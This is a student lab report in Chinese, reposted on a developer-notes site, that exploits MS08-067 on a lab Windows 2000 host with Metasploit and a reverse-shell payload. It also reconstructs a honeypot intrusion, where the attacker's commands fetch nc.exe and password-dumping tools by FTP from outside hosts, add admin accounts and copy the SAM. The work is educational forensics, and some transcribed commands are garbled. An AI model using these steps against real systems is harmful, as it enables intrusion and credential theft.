热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

20212909202120222《网络攻防实践》第六次作业

202129092021-2022-2《网络攻防实践》第六次作业一.实践内容动手实践Metasploitwindowsattacker取证分析实践:解码一次成功的NT系统破解攻击。

20212909 2021-2022-2 《网络攻防实践》第六次作业

一.实践内容



  • 动手实践Metasploit windows attacker

  • 取证分析实践:解码一次成功的NT系统破解攻击。

  • 团队对抗实践:windows系统远程渗透攻击和分析。

    实验环境

























镜像名称用户名密码IP地址
Kalikalikali192.168.200.6
win2kServerAdministratormima1234192.168.200.124

二.实践过程

1.动手实践Metasploit windows attacker



  • 任务:使用msfconsole软件进行windows远程渗透统计实验。

    (1)在kali中输入 msfconsole进入metasploit。



    (2)输入命令search ms08_067查找ms08_067漏洞,可以得到针对该漏洞的渗透攻击模块,再执行命令:use exploit/windows/smb/ms08_067_netapi表示我们将攻击的漏洞。





    (3)输入show options,查看攻击此漏洞需要的设置。



    (4)输入show payloads,显示此漏洞的载荷,选择第三个载荷进行攻击



    (5)输入命令set payload generic/shell_reverse_tcp设置载荷,输入set RHOST 192.168.200.124设置攻击对象IP、输入set LHOST 192.168.200.6设置本机IP,输入exploit进行爆破,出现会话连接表示攻击成功。

    浏览wireshark抓包情况可知攻击利用的漏洞有,针对SMB网络服务的漏洞DCERPC解析器拒绝服务漏洞,SPOOLSS打印服务假冒漏洞。



    (6)输入ipconfig/all查看靶机所以的ip配置,攻击成功。



    (7)打开wireshark,查看抓包,可见源地址为192.168.200.6,源端口为39993,目的地址为192.168.200.124,目的端口为445,攻击发起时间从ARP协议的询问开始。





    (8)查看wireshark抓包的TCP流,可以看到靶机中输入的命令行被抓取。








  1. 取证分析实践:解码一次成功的NT系统破解攻击。



  • 任务

    来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。

    攻击者使用了什么破解工具进行攻击

    攻击者如何使用这个破解工具进入并控制了系统

    攻击者获得系统访问权限后做了什么

    我们如何防止这样的攻击

    你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

    (1)使用wireshark打开实验材料snort-0204@0117.log文件



    (2)以ip.addr=172.16.1.106 and http为筛选条件查看数据包



    (3)查看编号111的数据报,查看其TCP数据流,其中boot.ini是NT系统的启动文件,..%c0af..是"/"的Unicode编码。这是IIS存在的一个漏洞。说明攻击者通过IIS Unicode漏洞了解了被攻击主机操作系统的一些基本情况





    (4)继续跟踪数据流找到msadc,查看tcp流,发现有shell和!ADM则有rds漏洞





    (4)整理shell代码

    shell ("cmd /c echo werd >> c: fu n);

    shell("cmd /c echo user johna2k > ftpcom")

    shell("cmd /c echo hacker 2000 >> ftpcom")

    shell("cmd /c echo get pump.exe >> ftpcom"

    shell ("cmd /c echo get nc.exe>>{tpcom");

    shell ("cmd /c echo quit>>ftpcom")

    shell("cmd /c ftp - s : ftpcom- n www.nether.net");

    shell ("cmd /c pdump .exe>>new.pass" )

    shell ("cmd /c echo userjohna2k > ftpcom2)

    shell ("md /c echo hacker2000>>ftpcom2)

    shell("cmd /c put new . pass>>ftpcom2)

    shell("cmd /c echo quit>>ftpcom2)

    shell("cmd /c ftp -S : ftpcom2 - n www.nether.net");

    shell("cmd /c ftp 213.116.251.162)

    shell ("cmd /c echo open 213.116.251.162 > ftpcom " );

    shell ("cmd /c echo johna2k > ftpcom")

    shell ("cmd /c echo hacker2000>>ftpcom)

    shell ("cmd /c echo get samdump.dIl>>ftpcom")

    shell("cmd /c echo get pdump.exe>>ftpcom")

    shell ("cmd /c echo get nc.exe>>itpcom)

    shell("cmd /c echo quit>>ftpcom")

    第一、二段中使用ftpcom可知攻击机打开IP213.116.251.162,使用ftp的方式下载文件,pdump.exe和samdump.dll是配合使用破解口令的,samdump.dll拿到口令pdump.exe破解,SAM文件通过安全表示进行账号安全管理文件。

    注:本地特权提升采用dll注入或破解程序漏洞得到。

shell ( "cmd /c open 212.139.12.26)

shell("cmd /c echo iohna2k>>sasfile)

shell ("cmd /c echo haxedj00>>sasfile)

shell("cmd /c echo get pdump.exe>>sasfile)

shell("cmd /c echo get samdump.dIl>>sasfile)

shell ( "cmd /c echo get nc.exe>>sasfile)

shell ("cmd /c echo quit>>sasfile)

shell ("cmd /c ftp - s : sasfile ")

shell ( "cmd /c open 213.116.251.162 ")

shell ("cmd /c echo johna2k>>sasfile)

shell("cmd /c echo haxedi00>>sasfile)

shell ( "cmd /c echo get pdump.exe>>sasfile)

shell ( "cmd /c echo get samdump.dil>>sasfile)

shell ("cmd /c echo get nc.exe>>sasfile)

shell("cmd /c echo quit>>sasfile)

第二段和第三段中sasfile为高效读入数据的方式,因此为IP分别为212.139.12.26和213.116.251.162号入了文件,值得注意的是nc.exe文件是一个远程入侵的后门程序,便于下次攻击;

再继续分析msadcs.dll的shell命令,整理如下

#注意关键字ProgramFiles

shell (" cmd / c C: ProgramFiles CommonFiles system msadc pump.exe > > yay.txt)

shell (" cmd / c C: ProgramFiles CommonFiles system made pdump.ex > > yay.txt " )

#创建会话写入文件yay.txt

shell ("cmd/ c pdump.exe >> c: yay.txt)

shell ("cmd / c net session > > yay2.txt ")

shell("cmd / c net session > > yay2.txt ")

shell("cmd /c net users > > heh.txt")

shell("cmd /c net users >> c: heh.txt ")

#创建用户组提升自己的访问权限

shell ("/ c net localgroup Domain Admin I WAM_ KENNY / ADD " )

shell (" / c net user testuser UgotHacked / A D D")

shell ( "/ c net localgroup Administrators testuser / A D D" )

从上边的shell命令可以看到攻击机进入靶机之后查看了一些系统文件,注意关键字ProgramFiles;然后创建会话写入文件yay.txt,注意到前面有pdump.exe,这是

上一步中提到的口令破解文件,因此猜测创建的会话将破解的口令写入文件yay.txt中;

再继续分析msadcs.dll的sthell命令,整理如下:

shell("cmd/crdisk-/s")

shell("cmd / crdisk -s)

shell("cmd / crdisk")

shell("cmd/crdisk-/s")

shell("cmd / crdisk - s")

shell("cmd / crdisk / S -")

shell("cmd / crdisk/s-")

shell ("cmd / crdisk/s")

#试图朋除和拷贝SAM中的数据(删除和拷贝har.txt)

shell("cmd / c typec: winnt repair sam.> > C: har.txt )

shell("cmd / c delc : inetpub wwwroot har.txt")

shell ("cmd/ c delc: inetpub wwwroot har.txt)

接下来是要创建了用户组等提升攻击机的访问权限;然后利用磁盛修复工具包中的rdisk工具创建SAM文件副本(SAM文件中可是安全账号管理哦!)可以发现创建的口令来来回回执行了好几次,猜测这个攻击者这步操作不是很顺利?!毕竟是SAM文件!然后是尝试删除和拷贝SAM文件中的数据即删除和拷贝har.txt文件;

(5)查看NO.1233的tcp流发现端口6969是木马Gatecrasher、Priority开放的端口。











以上的NT分析给了我们提醒如果我们的主机被攻击了怎么办,所以我们需要防范措施如下:



  • 首先肯定是自身的口令要是强口令,这样可以增大破解口令难度;

  • 然后是定期的打补丁,修复漏洞;

  • 最后是要定期的扫描自身的主机,查看是否存在漏洞等危险。

3.团队对抗实践:windows系统远程渗透攻击和分析。

我和20212908yxy完成的这项实验

























本攻击攻击机 IP本机靶机IP对方攻击机IP对方靶机IP
kaliwin2kServerkaliwin2kServer
172.20.10.7172.20.10.8172.20.10.9172.20.10.5


  • 攻击

    (1)首先ping对方靶机IP,正常可以ping通



    (2)重复任务1命令进行攻击,攻击成功





    (3)输入echo . > 20212909ghh.txt创建一个.txt文件,这是从yxy同学电脑截的图,表示攻击成功


  • 防守

    (1)yxy同学攻击我的主机IP成功



    (2)根据wiresharkTCP流分析可知其攻击创建文件夹的命令



三.学习中遇到的问题

Pa.在攻防的时候,靶机IP改不了

Sloua:之前靶机IP设定的固定IP,需要改成动态获取IP


四.实践总结

本次实验动手实践了使用msf渗透主机的过程,了解了这个工具的使用,也仔细分析了一次成功的NT系统破解攻击,同时和同学完成了一次简单的网络攻防。



推荐阅读
  • 目录浏览漏洞与目录遍历漏洞的危害及修复方法
    本文讨论了目录浏览漏洞与目录遍历漏洞的危害,包括网站结构暴露、隐秘文件访问等。同时介绍了检测方法,如使用漏洞扫描器和搜索关键词。最后提供了针对常见中间件的修复方式,包括关闭目录浏览功能。对于保护网站安全具有一定的参考价值。 ... [详细]
  • 本文介绍了使用cacti监控mssql 2005运行资源情况的操作步骤,包括安装必要的工具和驱动,测试mssql的连接,配置监控脚本等。通过php连接mssql来获取SQL 2005性能计算器的值,实现对mssql的监控。详细的操作步骤和代码请参考附件。 ... [详细]
  • 如何使用Java获取服务器硬件信息和磁盘负载率
    本文介绍了使用Java编程语言获取服务器硬件信息和磁盘负载率的方法。首先在远程服务器上搭建一个支持服务端语言的HTTP服务,并获取服务器的磁盘信息,并将结果输出。然后在本地使用JS编写一个AJAX脚本,远程请求服务端的程序,得到结果并展示给用户。其中还介绍了如何提取硬盘序列号的方法。 ... [详细]
  • 如何在服务器主机上实现文件共享的方法和工具
    本文介绍了在服务器主机上实现文件共享的方法和工具,包括Linux主机和Windows主机的文件传输方式,Web运维和FTP/SFTP客户端运维两种方式,以及使用WinSCP工具将文件上传至Linux云服务器的操作方法。此外,还介绍了在迁移过程中需要安装迁移Agent并输入目的端服务器所在华为云的AK/SK,以及主机迁移服务会收集的源端服务器信息。 ... [详细]
  • 本文详细介绍了cisco路由器IOS损坏时的恢复方法,包括进入ROMMON模式、设置IP地址、子网掩码、默认网关以及使用TFTP服务器传输IOS文件的步骤。 ... [详细]
  • 恶意软件分析的最佳编程语言及其应用
    本文介绍了学习恶意软件分析和逆向工程领域时最适合的编程语言,并重点讨论了Python的优点。Python是一种解释型、多用途的语言,具有可读性高、可快速开发、易于学习的特点。作者分享了在本地恶意软件分析中使用Python的经验,包括快速复制恶意软件组件以更好地理解其工作。此外,作者还提到了Python的跨平台优势,使得在不同操作系统上运行代码变得更加方便。 ... [详细]
  • 本文讨论了在使用PHP cURL发送POST请求时,请求体在node.js中没有定义的问题。作者尝试了多种解决方案,但仍然无法解决该问题。同时提供了当前PHP代码示例。 ... [详细]
  • PHP组合工具以及开发所需的工具
    本文介绍了PHP开发中常用的组合工具和开发所需的工具。对于数据分析软件,包括Excel、hihidata、SPSS、SAS、MARLAB、Eview以及各种BI与报表工具等。同时还介绍了PHP开发所需的PHP MySQL Apache集成环境,包括推荐的AppServ等版本。 ... [详细]
  • {moduleinfo:{card_count:[{count_phone:1,count:1}],search_count:[{count_phone:4 ... [详细]
  • asp中如何嵌入python的简单介绍
    本文目录一览:1、如何在IIS中执行Python脚本 ... [详细]
  • Linux一键安装web环境全攻略
    摘自阿里云服务器官网,此处一键安装包下载:点此下载安装须知1、此安装包可在阿里云所有Linux系统上部署安装,此安装包包含的软件及版本为& ... [详细]
  • 如何搭建服务器环境php(2023年最新解答)
    导读:本篇文章编程笔记来给大家介绍有关如何搭建服务器环境php的相关内容,希望对大家有所帮助,一起来看看吧。本文目录一览:1、怎么搭建p ... [详细]
  • 渗透测试基础bypass绕过阻挡我们的WAF(下)
    渗透测试基础-bypass ... [详细]
  • 织梦DedeCMS配置手机wap站点,并绑定二级域名
    织梦DedeCMS织梦配置手机wap站点,并绑定二级域名。1.安装手机wap浏览模块2.根目录创建wap文件夹,将templets\wap文件移入根目录下的wap,如图:织梦Ded ... [详细]
  • 网络安全是一个非常重要的课题,基本上你运行的服务后台越多,你就可能打开更多的安全漏洞.如果配置的恰当的话,Linux本身是非常安全可靠的,假使在Linux系统中有某个安全缺陷,由于Linu ... [详细]
author-avatar
mobiledu2502855907
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有